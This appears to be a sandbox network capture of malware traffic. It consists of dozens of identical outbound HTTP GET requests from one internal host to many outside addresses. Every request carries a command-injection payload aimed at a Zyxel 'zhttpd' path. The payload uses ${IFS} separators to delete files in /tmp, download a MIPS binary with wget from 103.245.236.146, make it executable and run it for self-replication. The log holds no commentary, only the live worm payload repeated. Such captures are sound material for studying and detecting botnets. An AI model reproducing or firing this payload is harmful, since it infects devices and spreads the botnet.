                                      Jan 19, 2024 17:29:22.578489065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2131192.168.2.1454292157.130.245.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578537941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2132192.168.2.143852047.200.168.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578564882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2133192.168.2.1439936142.40.38.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578610897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2134192.168.2.1452894165.127.198.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578663111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2135192.168.2.1453552207.116.204.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578685045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2136192.168.2.145638065.14.39.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578742981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2137192.168.2.1439878109.200.225.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578778982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2138192.168.2.1442068191.158.200.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578813076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2139192.168.2.1434902209.90.21.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578857899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2140192.168.2.145350618.94.203.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578887939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2141192.168.2.145445448.158.59.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578931093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2142192.168.2.1449900109.186.59.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.578975916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2143192.168.2.1435858205.189.31.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579020023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2144192.168.2.1443086174.214.145.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579055071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2145192.168.2.144727497.110.181.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579088926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2146192.168.2.145981674.94.66.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579123974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2147192.168.2.1438444175.211.34.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579175949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2148192.168.2.145392086.84.192.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579199076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2149192.168.2.143674652.24.5.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579226971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2150192.168.2.145584451.201.142.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579252958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2151192.168.2.1436206113.182.99.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579299927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2152192.168.2.14377128.186.42.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579334974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2153192.168.2.1443204223.200.26.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579387903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2154192.168.2.143476898.189.22.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579418898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2155192.168.2.1444004103.73.101.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579468012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2156192.168.2.1455490123.71.221.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.579478979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2157192.168.2.14416742.239.101.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.583270073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2158192.168.2.143439098.22.162.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.583291054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2159192.168.2.1444248182.106.182.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.583338022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2160192.168.2.1447836100.2.82.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.583400011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2161192.168.2.1455882177.245.16.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.583425045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2162192.168.2.144915218.186.71.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.583463907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2163192.168.2.1447114124.213.114.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.583515882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2164192.168.2.1452622131.83.219.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.583561897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2165192.168.2.1440280121.39.122.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.592952013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2166192.168.2.144904050.183.207.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.592988968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2167192.168.2.1449758179.3.148.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593020916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2168192.168.2.1441472198.56.104.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593065023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2169192.168.2.1434036140.175.138.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593127012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2170192.168.2.1449892165.155.131.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593185902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2171192.168.2.144445280.29.236.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593229055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2172192.168.2.14482244.111.11.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593287945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2173192.168.2.143801484.195.172.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593322039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2174192.168.2.144490667.0.236.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593328953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2175192.168.2.143452482.233.71.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593350887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2176192.168.2.144367877.133.187.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593380928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2177192.168.2.145302297.27.193.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593415976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2178192.168.2.1444472143.146.88.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593460083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2179192.168.2.1458082177.8.33.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593540907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2180192.168.2.1451082190.119.148.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593588114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2181192.168.2.143441699.174.64.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593626022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2182192.168.2.1439454205.50.213.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593678951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2183192.168.2.145316253.181.208.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593688965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2184192.168.2.1444144134.26.111.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593728065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2185192.168.2.145961091.156.128.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593744993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2186192.168.2.1445246204.129.63.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593796968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2187192.168.2.143566043.89.128.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593837976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2188192.168.2.1445634119.197.47.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593877077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2189192.168.2.1440980148.143.57.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593905926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2190192.168.2.1438708106.248.127.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593975067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2191192.168.2.145054643.182.197.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.593975067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2192192.168.2.1457420218.241.94.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594033957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2193192.168.2.1459262218.231.95.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594099998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2194192.168.2.143394627.72.103.38443
                                      TimestampBytes transferredDirectionData
